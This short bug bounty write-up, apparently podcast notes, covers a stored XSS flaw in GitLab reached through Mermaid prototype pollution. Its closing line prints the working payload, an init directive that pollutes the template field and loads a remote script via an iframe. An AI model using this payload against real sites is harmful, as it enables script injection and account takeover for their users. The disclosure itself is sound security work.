[GitLab] Stored XSS via Mermaid Prototype Pollution vulnerability ($3000 USD)
We discussed this vulnerability during Episode 103 on 29 November 2021
Prototype pollution through a Mermaid diagram embedded in markdown leading to stored XSS.
Rather than trying to describing how Mermaid works the payload can show this issue pretty clearly. The init
field allows setting of __proto__
(and prototype
was used to bypass the first fix). This can be used to pollute the template
field which enabled XSS.
%%{init: { '__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"<script src=https://gitlab.com/bugbountyuser1/csp/-/jobs/1030502035/artifacts/raw/payload.js> </script>\">'}} }%%